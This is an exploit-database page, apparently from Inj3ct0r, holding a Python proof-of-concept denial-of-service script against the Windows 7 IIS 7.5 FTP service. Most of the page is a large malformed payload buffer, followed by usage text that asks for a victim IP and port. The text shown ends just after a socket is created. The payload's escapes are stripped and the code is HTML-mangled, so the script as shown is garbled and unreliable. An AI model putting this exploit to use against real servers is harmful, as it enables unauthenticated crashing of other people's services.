[dos / poc] - Windows 7 IIS7.5 FTPSVC UNAUTH'D Remote D

Posted on 21 December 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Windows 7 IIS7.5 FTPSVC UNAUTH&#039;D Remote DoS PoC | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Windows 7 IIS7.5 FTPSVC UNAUTH&#039;D Remote DoS PoC by Matthew Bergin in dos / poc | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>===============================================
Windows 7 IIS7.5 FTPSVC UNAUTH&#039;D Remote DoS PoC
===============================================

import socket, sys
print &quot;
&quot;
print &quot;----------------------------------------------------------------&quot;
print &quot;|      Windows 7 IIS7.5 FTPSVC UNAUTH&#039;D REMOTE DOS POC          |&quot;
print &quot;|      Matthew Bergin, Bergin Penetration Testing               |&quot;
print &quot;|       Win7 Ultimate v6.1 build 7600, IIS 7.5.7600.16385                     |&quot;
print &quot;----------------------------------------------------------------&quot;
print &quot;
&quot;
buf=(&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef&quot;
&quot;x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83&quot;
&quot;xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0&quot;
&quot;xefx83xb0xefx83xb0x31x34x34x39x38xefxbbxbfxffxef&quot;
&quot;xfexffxffxefxffxefxffxefxefxbbxbfxfexffxffxefxef&quot;
&quot;xbbxbfxfexffxefxbbxbfxffxefxefxbbxbfxefxbbxbfxff&quot;
&quot;xefxffxefxffxefxffxefxfexffxefxbbxbfxffxefxefxbb&quot;
&quot;xbfxffxefxefxbbxbfxefxbbxbfxefxbbxbfxffxefxfexff&quot;
&quot;xffxefxefxbbxbfxefxbbxbfxfexffxffxefxffxefxfexff&quot;
&quot;xffxefxfexffxfexffxefxbbxbfxffxefxfexffxffxefxff&quot;
&quot;xefxefxbbxbfxfexffxefxbbxbfxefxbbxbfxffxefxffxef&quot;
&quot;xfexffxffxefxffxefxffxefxffxefxefxbbxbfxfexffxef&quot;
&quot;xbbxbfxefxbbxbfxffxefxffxefxffxefxffxefxffxefxfe&quot;
&quot;xffxfexffxfexffxfexffxefxbbxbfxffxefxefxbbxbfxff&quot;
&quot;xefxffxefxefxbbxbfxffxefxefxbbxbfxefxbbxbfxffxef&quot;
&quot;xefxbbxbfxfexffxfexffxffxefxffxefxfexffxfexffxef&quot;
&quot;xbbxbfxefxbbxbfxefxbbxbfxefxbbxbfxefxbbxbfxffxef&quot;
&quot;xffxefxefxbbxbfxefxbbxbfxefxbbxbfxefxbbxbfxffxef&quot;
&quot;xefxbbxbfxefxbbxbfxffxefxefxbbxbfxefxbbxbfxefxbb&quot;
&quot;xbfxefxbbxbfxffxefxefxbbxbfxfexffxefxbbxbfxffxef&quot;
&quot;xffxefxefxbbxbfxefxbbxbfxfexffxffxefxefxbbxbfxfe&quot;
&quot;xffxefxbbxbfxefxbbxbfxfexffxefxbbxbfxefxbbxbfxfe&quot;
&quot;xffxfexffxefxbbxbfxefxbbxbfxffxefxefxbbxbfxfexff&quot;
&quot;xffxefxefxbbxbfxefxbbxbfxffxefxffxefxfexffxffxef&quot;
&quot;xffxefxfexffxffxefxfexffxefxbbxbfxefxbbxbfxefxbb&quot;
&quot;xbfxefxbbxbfxffxefxffxefxfexffxfexffxefxbbxbfxff&quot;
&quot;xefxfexffxfexffxffxefxefxbbxbfxfexffxfexffxefxbb&quot;
&quot;xbfxffxefxefxbbxbfxffxefxfexffxefxbbxbfxfexffxef&quot;
&quot;xbbxbfxfexffxffxefxfexffxffxefxfexffxfexffxefxbb&quot;
&quot;xbfxffxefxffxefxfexffxefxbbxbfxffxefxefxbbxbfxef&quot;
&quot;xbbxbfxffxefxfexffxffxefxffxefxfexffxfexffxfexff&quot;
&quot;xfexffxefxbbxbfxffxefxfexffxefxbbxbfxefxbbxbfxfe&quot;
&quot;xffxffxefxfexffxefxbbxbfxefxbbxbfxefxbbxbfxefxbb&quot;
&quot;xbfxefxbbxbfxfexffxfexffxffxefxefxbbxbfxffxefxff&quot;
&quot;xefxefxbbxbfxfexffxefxbbxbfxffxefxefxbbxbfxefxbb&quot;
&quot;xbfxefxbbxbfxefxbbxbfxffxefxfexffxfexffxefxbbxbf&quot;
&quot;xefxbbxbfxfexffxffxefxfexffxefxbbxbfxefxbbxbfxef&quot;
&quot;xbbxbfxfexffxffxefxfexffxffxefxefxbbxbfxfexffxff&quot;
&quot;xefxffxefxffxefxefxbbxbfxefxbbxbfxffxefxefxbbxbf&quot;
&quot;xffxefxfexffxfexffxffxefxffxefxfexffxefxbbxbfxff&quot;
&quot;xefxffxefxffxefxffxefxefxbbxbfxfexffxefxbbxbfxfe&quot;
&quot;xffxefxbbxbfxffxefxfexffxefxbbxbfxefxbbxbfxfexff&quot;
&quot;xefxbbxbfxffxefxffxefxefxbbxbfxffxefxefxbbxbfxef&quot;
&quot;xbbxbfxfexffxefxbbxbfxffxefxfexffxefxbbxbfxffxef&quot;
&quot;xffxefxfexffxfexffxffxefxffxefxefxbbxbfxfexffxff&quot;
&quot;xefxefxbbxbf&quot;
&quot;xffxefxffxefxffxefxfexffxfexffxefxbbxbfxffxefxef&quot;
&quot;xbbxbfxffxefxefxbbxbfxffxefxfexffxffxefxefxbbxbf&quot;
&quot;xefxbbxbfxefxbbxbfxffxefxfexffxfexffxffxefxfexff&quot;
&quot;xfexffxffxefxefxbbxbfxffxefxefxbbxbfxefxbbxbfxef&quot;
&quot;xbbxbfxefxbbxbfxfexffxffxefxefxbbxbfxfexffxffxef&quot;
&quot;xffxefxefxbbxbfxefxbbxbfxefxbbxbfxefxbbxbfxfexff&quot;
&quot;xfexffxffxefxfexffxefxbbxbfxffxefxffxefxfexffxff&quot;
&quot;xefxfexffxefxbbxbfxefxbbxbfxefxbbxbfxefxbbxbfxff&quot;
&quot;xefxffxefxefxbbxbfxfexffxfexffxffxefxffxefxffxef&quot;
&quot;xfexffxefxbbxbfxefxbbxbfxffxefxffxefxfexffxffxef&quot;
&quot;xffxefxfexffxffxefxfexffxfexffxfexffxffxefxfexff&quot;
&quot;xfexffxffxefxefxbbxbfxefxbbxbfxfexffxffxefxefxbb&quot;
&quot;xbfxffxefxfexffxefxbbxbfxffxefxffxefxefxbbxbfxff&quot;
&quot;xefxfexffxfexffxefxbbxbfxefxbbxbfxefxbbxbfxffxef&quot;
&quot;xefxbbxbfxffxefxefxbbxbfxffxefxfexffxfexffxffxef&quot;
&quot;xffxefxefxbbxbfxffxefxefxbbxbfxfexffxfexffxefxbb&quot;
&quot;xbfxfexffxfexffxfexffxfexffxffxefxefxbbxbfxefxbb&quot;
&quot;xbfxffxefxfexffxfexffxfexffxefxbbxbfxefxbbxbfxef&quot;
&quot;xbbxbfxefxbbxbfxefxbbxbfxffxefxffxefxffxefxfexff&quot;
&quot;xffxefxfexffxefxbbxbfxfexffxfexffxfexffxefxbbxbf&quot;
&quot;xffxefxffxefxefxbbxbfxffxefxffxefxfexffxffxefxfe&quot;
&quot;xffxefxbbxbfxffxefxefxbbxbfxefxbbxbfxefxbbxbfxef&quot;
&quot;xbbxbfxefxbbxbfxfexffxefxbbxbfxffxefxffxefxfexff&quot;
&quot;xffxefxfexffxfexffxfexffxfexffxfexffxefxbbxbfxfe&quot;
&quot;xffxfexffxfexffxefxbbxbfxfexffxffxefxffxefxefxbb&quot;
&quot;xbfxfexffxfexffxffxefxefxbbxbfxefxbbxbfxffxefxff&quot;
&quot;xefxffxefxefxbbxbfxffxefxefxbbxbfxffxefxffxefxfe&quot;
&quot;xffxffxefxefxbbxbfxefxbbxbfxefxbbxbfxefxbbxbfxff&quot;
&quot;xefxffxefxffxefxfexffxefxbbxbfxefxbbxbfxefxbbxbf&quot;
&quot;xfexffxffxefxfexffxfexffxefxbbxbfxffxefxfexffxfe&quot;
&quot;xffxffxefxefxbbxbfxffxefxffxefxfexffxfexffxfexff&quot;
&quot;xffxefxffxefxffxefxfexffxefxbbxbfxefxbbxbfxffxef&quot;
&quot;xfexffxffxefxfexffxffxefxfexffxfexffxfexffxffxef&quot;
&quot;xfexffxffxefxfexffxffxefxefxbbxbfxefxbbxbfxffxef&quot;
&quot;xffxefxffxefxfexffxffxefxfexffxfexffxffxefxfexff&quot;
&quot;xefxbbxbfxfexffxefxbbxbfxefxbbxbfxfexffxefxbbxbf&quot;
&quot;xffxefxefxbbxbfxffxefxfexffxfexffxfexffxefxbbxbf&quot;
&quot;xfexffxefxbbxbfxefxbbxbfxefxbbxbfxffxefxffxefxfe&quot;
&quot;xffxefxbbxbfxefxbbxbfxffxefxefxbbxbfxffxefxfexff&quot;
&quot;xffxefxfexffxffxefxfexffxfexffxffxefxefxbbxbfxef&quot;
&quot;xbbxbfxfexffxffxefxefxbbxbfxfexffxfexffxfexffxfe&quot;
&quot;xffxfexffxffxefxffxefxffxefxfexffxfexffxefxbbxbf&quot;
&quot;xffxefxfexffxfexffxefxbbxbfxffxefxfexffxefxbbxbf&quot;
&quot;xffxefxffxefxefxbbxbfxefxbbxbfxffxefxffxefxffxef&quot;
&quot;xefxbbxbfxffxefxfexffxffxefxfexffxefxbbxbfxefxbb&quot;
&quot;xbfxefxbbxbfxefxbbxbfxefxbbxbfxefxbbxbfxefxbbxbf&quot;
&quot;xfexffxefxbbxbfxffxefxffxefxfexffxffxefxefxbbxbf&quot;
&quot;xefxbbxbfxefxbbxbfxffxefxfexffxfexffxffxefxefxbb&quot;
&quot;xbfxefxbbxbfxfexffxffxefxefxbbxbfxfexffxfexffxfe&quot;
&quot;xffxefxbbxbfxffxefxfexffxfexffxffxefxefxbbxbfxef&quot;
&quot;xbbxbfxffxefxfexffxffxefxffxefxffxefxffxefxefxbb&quot;
&quot;xbfxffxefxefxbbxbfxffxefxefxbbxbfxefxbbxbfxffxef&quot;
&quot;xefxbbxbfxfexffxffxefxffxefxffxefxefxbbxbfxefxbb&quot;
&quot;xbfxefxbbxbfxefxbbxbfxefxbbxbfxefxbbxbfxfexffxef&quot;
&quot;xbbxbfxfexffxfexffxfexffxffxefxefxbbxbfxfexffxef&quot;
&quot;xbbxbfxfexffxfexffxefxbbxbfxefxbbxbfxffxefxefxbb&quot;
&quot;xbfxefxbbxbfxffxefxfexffxefxbbxbfxefxbbxbfxefxbb&quot;
&quot;xbfxfexffxffxefxffxefxfexffxfexffxfexffxfexffxef&quot;
&quot;xbbxbfxffxefxffxefxfexffxffxefxefxbbxbfxefxbbxbf&quot;
&quot;xefxbbxbfxffxefxfexffxefxbbxbfxffxefxefxbbxbfxff&quot;
&quot;xefxffxefxfexffxefxbbxbfxffxefxfexffxfexffxefxbb&quot;
&quot;xbfxffxefxefxbbxbfxffxefxfexffxfexffxffxefxffxef&quot;
&quot;xefxbbxbfxfexffxefxbbxbfxffxefxffxefxfexffxefxbb&quot;
&quot;xbfxefxbbxbfxfexffxefxbbxbfxefxbbxbfxffxefxefxbb&quot;
&quot;xbfxffxefxefxbbxbfxfexffxefxbbxbfxfexffxffxefxfe&quot;
&quot;xffxefxbbxbfxffxefxefxbbxbfxfexffxefxbbxbfxefxbb&quot;
&quot;xbfxffxefxfexffxfexffxffxefxfexffxefxbbxbfxffxef&quot;
&quot;xfexffxefxbbxbfxfexffxffxefxffxefxfexffxffxefxef&quot;
&quot;xbbxbfxefxbbxbfxefxbbxbfxefxbbxbfxefxbbxbfxfexff&quot;
&quot;xefxbbxbfxfexffxefxbbxbfxefxbbxbfxefxbbxbfxfexff&quot;
&quot;xefxbbxbfxefxbbxbfxfexffxffxefxffxefxfexffxfexff&quot;
&quot;xefxbbxbfxfexffxfexffxfexffxfexffxfexffxfexffxff&quot;
&quot;xefxfexffxffxefxffxefxffxefxffxefxfexffxfexffxef&quot;
&quot;xbbxbfxffxefxffxefxefxbbxbfxffxefxefxbbxbfxffxef&quot;
&quot;xfexffxefxbbxbfxffxefxfexffxffxefxefxbbxbfxffxef&quot;
&quot;xefxbbxbfxefxbbxbfxffxefxfexffxefxbbxbfxefxbbxbf&quot;
&quot;xefxbbxbfxfexffxefxbbxbfxfexffxffxefxefxbbxbfxef&quot;
&quot;xbbxbfxefxbbxbfxefxbbxbfxefxbbxbfxefxbbxbfxefxbb&quot;
&quot;xbfxfexffxefxbbxbfxefxbbxbfxefxbbxbfxefxbbxbfxfe&quot;
&quot;xffxfexffxffxefxfexffxefxbbxbfxefxbbxbfxfexffxff&quot;
&quot;xefxffxefxefxbbxbfxefxbbxbfxefxbbxbfxfexffxefxbb&quot;
&quot;xbfxfexffxefxbbxbfxefxbbxbfxefxbbxbfxfexffxefxbb&quot;
&quot;xbfxfexffxefxbbxbfxffxefxfexffxefxbbxbfxffxefxff&quot;
&quot;xefxfexffxfexffxfexffxefxbbxbfxfexffxefxbbxbfxfe&quot;
&quot;xffxffxefxfexffxfexffxffxefxffxefxfexffxffxefxff&quot;
&quot;xefxefxbbxbfxefxbbxbfxefxbbxbfxfexffxffxefxefxbb&quot;
&quot;xbfxffxefxfexffxffxefxfexffxefxbbxbfxefxbbxbfxff&quot;
&quot;xefxefxbbxbfxfexffxffxefxffxefxffxefxffxefxffxef&quot;
&quot;xfexffxefxbbxbfxfexffxffxefxffxefxffxefxfexffxef&quot;
&quot;xbbxbfxffxefxfexffxfexffxefxbbxbfxffxefxfexffxef&quot;
&quot;xbbxbfxfexffxffxefxfexffxefxbbxbfxefxbbxbfxfexff&quot;
&quot;xffxefxffxef&quot;
&quot;xffxefxefxbbxbfxefxbbxbfxfexffxefxbbxbfxefxbbxbf&quot;
&quot;xffxefxefxbbxbfxefxbbxbfxfexffxefxbbxbfxfexffxef&quot;
&quot;xbbxbfxefxbbxbfxfexffxffxefxefxbbxbfxefxbbxbfxff&quot;
&quot;xefxffxefxfexffxffxefxefxbbxbfxffxefxefxbbxbfxff&quot;
&quot;xefxffxefxffxefxefxbbxbfxefxbbxbfxefxbbxbfxefxbb&quot;
&quot;xbfxffxefxffxefxfexffxfexffxfexffxfexffxffxefxfe&quot;
&quot;xffxefxbbxbfxefxbbxbfxffxefxefxbbxbfxffxefxfexff&quot;
&quot;xffxefxffxefxffxefxefxbbxbfxefxbbxbfxffxefxffxef&quot;
&quot;xffxefxefxbbxbfxfexffxefxbbxbfxefxbbxbfxffxefxef&quot;
&quot;xbbxbfxefxbbxbfxfexffxefxbbxbfxffxefxefxbbxbfxef&quot;
&quot;xbbxbfxffxefxefxbbxbfxfexffxefxbbxbfxefxbbxbfxfe&quot;
&quot;xffxefxbbxbfxefxbbxbfxefxbbxbfxffxefxffxefxefxbb&quot;
&quot;xbfxefxbbxbfxefxbbxbfxffxefxfexffxfexffxfexffxfe&quot;
&quot;xffxfexffxffxefxffxefxffxefxefxbbxbfxefxbbxbfxff&quot;
&quot;xefxefxbbxbfxffxefxfexffxefxbbxbfxffxefxfexffxff&quot;
&quot;xefxefxbbxbfxefxbbxbfxefxbbxbfxefxbbxbfxfexffxfe&quot;
&quot;xffxefxbbxbfxfexffxffxefxfexffxefxbbxbfxffxefxff&quot;
&quot;xefxefxbbxbfxffxefxefxbbxbfxfexffxffxefxffxefxff&quot;
&quot;xefxefxbbxbfxefxbbxbfxffxefxefxbbxbfxffxefxffxef&quot;
&quot;xefxbbxbfxfexffxffxefxefxbbxbfxfexffxffxefxefxbb&quot;
&quot;xbfxefxbbxbfxffxefxefxbbxbfxffxefxfexffxefxbbxbf&quot;
&quot;xefxbbxbfxffxefxefxbbxbfxefxbbxbfxffxefxefxbbxbf&quot;
&quot;xffxefxefxbbxbfxefxbbxbfxefxbbxbfxefxbbxbfxefxbb&quot;
&quot;xbfxfexffxffxefxfexffxefxbbxbfxfexffxffxefxffxef&quot;
&quot;xffxefxffxefxefxbbxbfxfexffxffxefxefxbbxbfxffxef&quot;
&quot;xfexffxefxbbxbfxfexffxefxbbxbfxefxbbxbfxefxbbxbf&quot;)
 
 
def usage():
        print &quot;usage  : ./msiis7ftp.py &lt;victim_ip&gt;  &lt;victim_port&gt;&quot;
        print &quot;example: ./msiis7ftp.py 192.168.1.22 21&quot;
 
def main():
    if len(sys.argv) != 3:
            usage()
            sys.exit()
 
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
